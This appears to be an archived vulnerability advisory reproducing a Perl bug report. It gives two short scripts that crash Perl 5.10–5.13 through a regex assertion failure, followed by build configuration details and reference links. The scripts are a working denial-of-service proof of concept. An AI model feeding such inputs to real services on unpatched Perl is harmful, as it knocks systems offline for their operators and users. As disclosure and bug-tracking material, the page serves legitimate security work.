PERL 5.10.0, 5.12.0, 5.14.0 Denial of Service

2014.02.10
Credit: Nobody
Risk: Low
Local: Yes
Remote: No
CWE: CWE-20


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

This is a bug report for perl from mons@cpan.org,
generated with the help of perlbug 1.39 running under perl 5.12.0.

-----------------------------------------------------------------
[Please describe your issue here]

##### sample.pl #####
use utf8;
my @make;
while (<DATA>) {
    chomp;
    push @make, '';
    s{\\\s*$}{};
    $make[-1] .= $_;
}
for (@make) {
    m{^([^=]+?)\s*=\s*(.+)$}o;
}
__DATA__
A=
AAAA=\
### end sample.pl ###

or

##### sample.pl #####
my @x = ("A=B","AAAA=/");
utf8::upgrade $_ for @x;
$x[1] =~ s{/\s*$}{};
for (@x) {
    m{^([^=]+?)\s*=.+$};
}
### end sample.pl ###

Assertion failed: (rx->sublen >= (s - rx->subbeg) + i), function Perl_reg_numbered_buff_fetch, file regcomp.c, line 5199.
Abort trap: 6 (core dumped)

Repeatable under:
- v5.10.1 (*) built for i686-linux-thread-multi
- v5.10.0 built for amd64-freebsd
- v5.10.1 (*) built for amd64-freebsd
- v5.12.0 built for amd64-freebsd
- v5.13.2 built for amd64-freebsd

[Please do not change anything below this line]
-----------------------------------------------------------------
---
Flags:
    category=core
    severity=medium
---
Site configuration information for perl 5.12.0:

Configured by mons at Fri May 7 14:44:18 MSD 2010.

Summary of my perl5 (revision 5 version 12 subversion 0) configuration:

  Platform:
    osname=freebsd, osvers=7.1-release-p2, archname=amd64-freebsd
    uname='freebsd veda.park.rambler.ru 7.1-release-p2 freebsd 7.1-release-p2 #0: thu feb 12 22:34:21 msk 2009 root@veda.park.rambler.ru:usrobjusrsrcsysdevel amd64 '
    config_args='-des -Dprefix=/home/mons -Duse64bitint -DDEBUG_LEAKING_SCALARS -DDEBUGGING -Dinc_version_list=none -Dccflags=-O2 -march=athlon64 -fomit-frame-pointer -pipe -ggdb -g3 -Doptimize=-O2 -g3'
    hint=recommended, useposix=true, d_sigaction=define
    useithreads=undef, usemultiplicity=undef
    useperlio=define, d_sfio=undef, uselargefiles=define, usesocks=undef
    use64bitint=define, use64bitall=define, uselongdouble=undef
    usemymalloc=n, bincompat5005=undef
  Compiler:
    cc='cc', ccflags ='-O2 -march=athlon64 -fomit-frame-pointer -pipe -ggdb -g3 -DHAS_FPSETMASK -DHAS_FLOATINGPOINT_H -DDEBUGGING -fno-strict-aliasing -fstack-protector -I/usr/local/include',
    optimize='-O2 -g3',
    cppflags='-O2 -march=athlon64 -fomit-frame-pointer -pipe -ggdb -g3 -DHAS_FPSETMASK -DHAS_FLOATINGPOINT_H -DDEBUGGING -fno-strict-aliasing -fstack-protector -I/usr/local/include'
    ccversion='', gccversion='4.2.1 20070719 [FreeBSD]', gccosandvers=''
    intsize=4, longsize=8, ptrsize=8, doublesize=8, byteorder=12345678
    d_longlong=define, longlongsize=8, d_longdbl=define, longdblsize=16
    ivtype='long', ivsize=8, nvtype='double', nvsize=8, Off_t='off_t', lseeksize=8
    alignbytes=8, prototype=define
  Linker and Libraries:
    ld='cc', ldflags ='-Wl,-E -fstack-protector -L/usr/local/lib'
    libpth=/usr/lib /usr/local/lib
    libs=-lgdbm -lm -lcrypt -lutil -lc
    perllibs=-lm -lcrypt -lutil -lc
    libc=, so=so, useshrplib=false, libperl=libperl.a
    gnulibc_version=''
  Dynamic Linking:
    dlsrc=dl_dlopen.xs, dlext=so, d_dlsymun=undef, ccdlflags=' '
    cccdlflags='-DPIC -fPIC', lddlflags='-shared -L/usr/local/lib -fstack-protector'

Locally applied patches:

---
@INC for perl 5.12.0:
    /home/mons/perl/perl-ex
    /home/mons/lib/perl5/site_perl/5.12.0/amd64-freebsd
    /home/mons/lib/perl5/site_perl/5.12.0
    /home/mons/lib/perl5/5.12.0/amd64-freebsd
    /home/mons/lib/perl5/5.12.0
    .
---
Environment for perl 5.12.0:
    HOME=/home/mons
    LANG=en_US.UTF-8
    LANGUAGE (unset)
    LD_LIBRARY_PATH (unset)
    LOGDIR (unset)
    PATH=/home/mons/home-bin:/home/mons/bin:/home/mons/flex/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/games:/usr/local/sbin:/usr/local/bin:/home/mons/bin
    PERL5LIB=/home/mons/perl/perl-ex
    PERL_BADLANG (unset)
    SHELL=/usr/local/bin/bash

References:

https://rt.perl.org/Public/Bug/Display.html?id=76538
https://listi.jpberlin.de/pipermail/postfixbuch-users/2011-February/055885.html
https://bugzilla.redhat.com/show_bug.cgi?id=694166
http://lists.opensuse.org/opensuse-updates/2011-05/msg00025.html
http://lists.opensuse.org/opensuse-security-announce/2011-05/msg00005.html
http://forums.ocsinventory-ng.org/viewtopic.php?id=7215
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=628836

